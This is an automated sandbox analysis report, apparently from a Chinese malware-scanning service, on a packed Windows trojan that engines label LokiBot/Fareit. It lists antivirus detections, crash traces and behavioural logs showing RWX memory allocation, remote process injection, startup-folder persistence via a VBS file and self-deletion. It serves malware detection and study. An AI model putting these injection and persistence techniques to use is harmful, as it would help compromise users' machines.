11.0
0-day
59 个模型检测该样本为恶意!
重新分析
更多

73e2e91f580ed409293022751426fadf79c60713b1bf1c24dd6006ba5d9bd170

757bc8ab5108fb1a24919f43e0bde7e2.exe

分析耗时

104s

最近分析

文件大小

960.5KB
静态报毒 动态报毒 8GW@AGKBBBDI AI SCORE=100 AIDETECTVM ALI2000015 ANDROM AUTOG AXAQ CLASSIC CONFIDENCE DELF DELFINJECT DELPHILESS EMOY EMTN FAREIT HIGH CONFIDENCE HORYRB IYPEP KCLOUD KRYPTIK LOKI LOKIBOT MALWARE1 MALWARE@#1ASE7DXZPJG7O PWSX QVM05 S + TROJ SCORE SMAD1 STATIC AI SUSGEN SUSPICIOUS PE TSCOPE UNSAFE X2094 ZELPHIF ZNOJ 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Fareit-FVZ!757BC8AB5108 20201211 6.0.6.653
Alibaba Trojan:Win32/DelfInject.ali2000015 20190527 0.3.0.5
CrowdStrike win/malicious_confidence_90% (W) 20190702 1.0
Baidu 20190318 1.0.0.2
Avast Win32:PWSX-gen [Trj] 20201210 21.1.5827.0
Kingsoft Win32.Hack.Undef.(kcloud) 20201211 2017.9.26.565
静态指标
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 个事件)
section CODE
section DATA
section BSS
The executable uses a known packer (1 个事件)
packer BobSoft Mini Delphi -> BoB / BobSoft
One or more processes crashed (7 个事件)
Time & API Arguments Status Return Repeated
1619605683.302125
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x750d4b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x750d5d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff5a148d
success 0 0
1619605694.146
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x75184b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x75185d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xfdb5148d
success 0 0
1619605701.240125
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x750e4b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x750e5d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff56148d
success 0 0
1619605710.380125
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x75184b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x75185d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 180
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff45148d
success 0 0
1619605727.411875
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x750e4b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x750e5d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff55148d
success 0 0
1619605736.895875
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x75184b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x75185d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff3e148d
success 0 0
1619605742.536625
__exception__
stacktrace: 
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x75184b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x75185d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xfdd5148d
success 0 0
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
Allocates read-write-execute memory (usually to unpack itself) (50 out of 222 个事件)
Time & API Arguments Status Return Repeated
1619596027.329879
NtAllocateVirtualMemory
process_identifier: 2900
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003e0000
success 0 0
1619596027.548879
NtProtectVirtualMemory
process_identifier: 2900
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 36864
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00469000
success 0 0
1619596027.564879
NtAllocateVirtualMemory
process_identifier: 2900
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00620000
success 0 0
1619605680.677
NtAllocateVirtualMemory
process_identifier: 2244
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003f0000
success 0 0
1619605680.802
NtProtectVirtualMemory
process_identifier: 2244
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 36864
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00469000
success 0 0
1619605680.802
NtAllocateVirtualMemory
process_identifier: 2244
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00880000
success 0 0
1619605682.333125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00400000
success 0 0
1619605682.396125
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x01ed0000
success 0 0
1619605682.396125
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f30000
success 0 0
1619605682.396125
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 630784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01f90000
success 0 0
1619605682.396125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 602112
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x01f92000
success 0 0
1619605683.208125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.208125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76353000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76354000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77d4f000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76353000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76354000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619605682.848375
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003f0000
success 0 0
1619605683.036375
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 36864
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00469000
success 0 0
1619605683.036375
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02070000
success 0 0
1619605691.8175
NtAllocateVirtualMemory
process_identifier: 3196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01e10000
success 0 0
1619605691.9895
NtProtectVirtualMemory
process_identifier: 3196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 36864
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00469000
success 0 0
1619605692.0045
NtAllocateVirtualMemory
process_identifier: 3196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02140000
success 0 0
1619605693.849
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00400000
success 0 0
1619605693.865
NtAllocateVirtualMemory
process_identifier: 3272
region_size: 524288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x01f20000
success 0 0
1619605693.865
NtAllocateVirtualMemory
process_identifier: 3272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f60000
success 0 0
1619605693.865
NtAllocateVirtualMemory
process_identifier: 3272
region_size: 630784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01fa0000
success 0 0
1619605693.88
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 602112
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x01fa2000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x005f2000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x005f2000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76353000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x005f2000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76354000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x005f2000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
Creates executable files on the filesystem (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\web.vbs
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (34 个事件)
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.520488350560497 section {'size_of_data': '0x00073600', 'virtual_address': '0x00082000', 'entropy': 7.520488350560497, 'name': '.rsrc', 'virtual_size': '0x00073450'} description A section with a high entropy has been found
entropy 0.48097967691505994 description Overall entropy of this PE file is high
Expresses interest in specific running processes (1 个事件)
process ghfjghfjhj.exe
Repeatedly searches for a not-found process, you may want to run a web browser during analysis (22 个事件)
Time & API Arguments Status Return Repeated
1619596027.579879
Process32NextW
process_name: 757bc8ab5108fb1a24919f43e0bde7e2.exe
snapshot_handle: 0x0000010c
process_identifier: 2900
failed 0 0
1619605680.833
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 2308
failed 0 0
1619605683.051375
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3124
failed 0 0
1619605691.067375
Process32NextW
process_name: ghfjghfjhj.exe
snapshot_handle: 0x000001ac
process_identifier: 2856
failed 0 0
1619605692.1615
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3256
failed 0 0
1619605695.30225
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3428
failed 0 0
1619605697.52125
Process32NextW
process_name: ghfjghfjhj.exe
snapshot_handle: 0x00000140
process_identifier: 3340
failed 0 0
1619605698.89625
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3508
failed 0 0
1619605702.2705
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3656
failed 0 0
1619605705.5205
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x00000164
process_identifier: 3692
failed 0 0
1619605707.50525
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3768
failed 0 0
1619605710.6455
Process32NextW
process_name: ghfjghfjhj.exe
snapshot_handle: 0x0000010c
process_identifier: 3848
failed 0 0
1619605720.4265
Process32NextW
process_name: ghfjghfjhj.exe
snapshot_handle: 0x000001bc
process_identifier: 3848
failed 0 0
1619605721.489625
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3128
failed 0 0
1619605728.379625
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3216
failed 0 0
1619605732.036625
Process32NextW
process_name: ghfjghfjhj.exe
snapshot_handle: 0x00000150
process_identifier: 2440
failed 0 0
1619605733.724
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3352
failed 0 0
1619605737.1615
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 3276
failed 0 0
1619605739.9575
Process32NextW
process_name: mscorsvw.exe
snapshot_handle: 0x0000015c
process_identifier: 3576
failed 0 0
1619605740.832625
Process32NextW
process_name: mscorsvw.exe
snapshot_handle: 0x0000010c
process_identifier: 3660
failed 0 0
1619605742.787
Process32NextW
process_name: inject-x86.exe
snapshot_handle: 0x0000010c
process_identifier: 4012
failed 0 0
1619605748.021
Process32NextW
process_name: sppsvc.exe
snapshot_handle: 0x0000017c
process_identifier: 1940
failed 0 0
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Creates an Alternate Data Stream (ADS) (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe:ZoneIdentifier
Allocates execute permission to another process indicative of possible code injection (1 个事件)
Time & API Arguments Status Return Repeated
1619596028.189879
NtAllocateVirtualMemory
process_identifier: 2208
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000114
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000f0000
success 0 0
Installs itself for autorun at Windows startup (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\web.vbs
Deletes executed files from disk (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
Creates a thread using NtQueueApcThread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 2900 created a thread in remote process 2208
Time & API Arguments Status Return Repeated
1619596028.189879
NtQueueApcThread
thread_handle: 0x0000011c
process_identifier: 2208
function_address: 0x000f05c0
parameter: 0x00100000
success 0 0
Potential code injection by writing to the memory of another process (2 个事件)
Time & API Arguments Status Return Repeated
1619596028.189879
WriteProcessMemory
process_identifier: 2208
